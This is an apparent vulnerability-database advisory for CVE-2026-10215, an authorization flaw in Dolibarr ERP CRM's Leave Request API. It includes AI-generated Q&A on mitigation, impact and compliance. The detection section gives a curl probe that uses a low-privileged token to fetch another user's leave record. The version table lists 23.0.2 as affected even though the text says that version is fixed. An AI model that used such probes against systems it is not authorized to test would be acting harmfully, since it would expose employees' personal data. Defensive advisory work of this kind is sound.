CVE-2026-10215
Improper Authorization in Dolibarr ERP CRM
Publication date: 2026-06-01
Last updated on: 2026-06-01
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dolibarr | erp_crm | to 23.0.1 (inc) |
| dolibarr | erp_crm | 23.0.0 |
| dolibarr | erp_crm | 23.0.2 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-285 | The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action. |
| CWE-266 | A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor. |
Attack-Flow Graph
AI Powered Q&A
What immediate steps should I take to mitigate this vulnerability?
The immediate and recommended mitigation step is to upgrade Dolibarr ERP CRM to version 23.0.2 or later, where the vulnerability has been fixed.
The fix involves correcting the authorization checks in the Leave Request API to ensure proper hierarchy and object-level access control.
Until the upgrade can be applied, consider restricting API access to trusted users only and monitoring API usage for suspicious access patterns.
Can you explain this vulnerability to me?
CVE-2026-10215 is a security vulnerability in Dolibarr ERP CRM up to version 23.0.1, specifically in the Leave Request REST API component. It involves improper authorization in the function checkUserAccessToObject, allowing a low-privileged user to bypass access controls.
The vulnerability allows an attacker to access leave request details of other employees via the API, even though the web user interface correctly restricts such access. This happens because the API performs weaker object-level authorization checks compared to the web UI, passing only a numeric ID and bypassing hierarchy-based permission checks.
The root cause is inconsistent access control enforcement between the API and the web UI, leading to unauthorized disclosure of sensitive leave data.
How can this vulnerability impact me? :
This vulnerability can lead to unauthorized disclosure of sensitive information such as leave schedules, approver details, and other business data of employees.
An attacker with limited permissions can exploit the API remotely to access data they should not be authorized to see, potentially enabling social engineering attacks or further exploitation within the organization.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the Leave Request REST API for improper authorization. Specifically, by attempting to access leave request details of other users via the API endpoints such as /api/index.php/holidays/{id} using a low-privileged user account.
A practical detection method involves creating two test accounts: one victim user and one attacker with limited permissions. Using the attacker account, send API requests to access leave requests of other users and observe if unauthorized data is returned.
Example command using curl to test unauthorized access:
- curl -H "Authorization: Bearer <attacker_token>" https://<dolibarr_instance>/api/index.php/holidays/8
If the response returns leave request details for an ID that the attacker should not have access to, the vulnerability is present.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability in Dolibarr ERP CRM allows unauthorized horizontal data access via the Leave Request API, enabling a low-privileged user to read leave request data of other ordinary users within the same entity.
This unauthorized disclosure of sensitive employee leave information could lead to violations of data privacy principles found in regulations such as GDPR and HIPAA, which require strict access controls and protection of personal and sensitive data.
Because the API bypasses proper authorization checks that are enforced in the Web UI, this inconsistency increases the risk of data exposure, potentially impacting compliance with standards that mandate confidentiality and proper authorization mechanisms.
Upgrading to version 23.0.2, which includes a fix for this issue, is recommended to restore proper access controls and help maintain compliance with such regulations.